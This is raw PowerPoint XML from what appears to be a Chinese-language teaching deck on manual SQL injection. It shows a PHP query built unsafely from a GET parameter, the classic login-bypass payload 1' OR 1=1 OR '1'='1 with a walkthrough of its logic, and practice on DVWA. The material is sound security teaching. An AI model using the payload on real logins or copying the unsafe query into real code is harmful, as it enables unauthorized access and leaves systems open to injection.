            <a:off x="2258695" y="6097905"/>
            <a:ext cx="4805680" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>POST注入过程与手工注入思路相同</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2754630" y="2773680"/>
            <a:ext cx="7827010" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>$id = $_GET['id'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>$sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
        <mc:Choice Requires="p14">
          <p:contentPart p14:bwMode="auto" r:id="rId3">
            <p14:nvContentPartPr>
              <p14:cNvPr id="8" name="墨迹 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{590DE837-F172-65DE-CE63-04DCF895B9F4}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5394240" y="1880280"/>
              <a:ext cx="1857600" cy="50040"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="8" name="墨迹 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{590DE837-F172-65DE-CE63-04DCF895B9F4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5384880" y="1870920"/>
                <a:ext cx="1876320" cy="6876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27860" y="1167130"/>
            <a:ext cx="9904730" cy="4523105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>POST方式万能密码原理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>SELECT * FROM admin WHERE Username='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1' OR 1=1 OR '1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>' AND Password='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EDFKGMZDFSDFDSFRRQWERRFGGG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>语句逻辑，优先级</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOT&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SELECT * FROM admin WHERE Username='1' OR 1=1 OR '1'='1' AND Password='EDFKGMZDFSDFDSFRRQWERRFGGG'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>整个语句逻辑判断为真，数据库验证通过。作用是取回表中所有结果，最常见的是用于绕过登录。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8223885" y="3619500"/>
            <a:ext cx="635635" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="Wingdings 2" panose="05020102010507070707" charset="0"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9286240" y="3687445"/>
            <a:ext cx="601980" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="Wingdings 2" panose="05020102010507070707" charset="0"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6434455" y="3619500"/>
            <a:ext cx="635635" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="Wingdings 2" panose="05020102010507070707" charset="0"/>
              </a:rPr>
              <a:t></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15607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方法的</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注入攻击</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="直接连接符 2"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9233535" y="3659505"/>
            <a:ext cx="654685" cy="82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a:off x="2032000" y="4457700"/>
            <a:ext cx="60325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p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5879465" y="3676650"/>
            <a:ext cx="17659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733155" y="3752215"/>
            <a:ext cx="553085" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>真</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="直接连接符 10"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8064500" y="3659505"/>
            <a:ext cx="617855" cy="82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4"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6235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SQL手工注入攻击步骤</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1769745" y="1210310"/>
            <a:ext cx="10321925" cy="1346835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、在掌握数据库信息的情况下，往数据库中插入或者查询数据的时候，需要知道什么信息构建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>语句呢？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1870075" y="2557145"/>
            <a:ext cx="10321925" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>根据数据库管理员用户名和密码，连接上数据库</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数据库名称、数据表、数据表中的字段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1778635" y="3718560"/>
            <a:ext cx="10222230" cy="1346835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、在不掌握数据库信息的情况下，往数据库中读取或者删除数据的时候，怎么办？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">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3011"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3012"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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43013" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3098864" y="971551"/>
            <a:ext cx="8943975" cy="4797425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="41275" y="4486657"/>
            <a:ext cx="4181475" cy="2163382"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="标题 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="239713"/>
            <a:ext cx="59436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3800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>手工</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>注入实例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="41275" y="18415"/>
            <a:ext cx="2715895" cy="2679194"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14605" y="2824608"/>
            <a:ext cx="2818765" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>https://dvwa.co.uk/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4035"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4036"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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44037" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1533525" y="579438"/>
            <a:ext cx="9253538" cy="5586412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="2997200"/>
            <a:ext cx="5132070" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>再通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>语句带入查询，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>并未设置任何过滤，因此可以进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>注入利用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5791200" y="898525"/>
            <a:ext cx="4876800" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>由代码可知，通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>REQUEST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>方式接受传递的参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
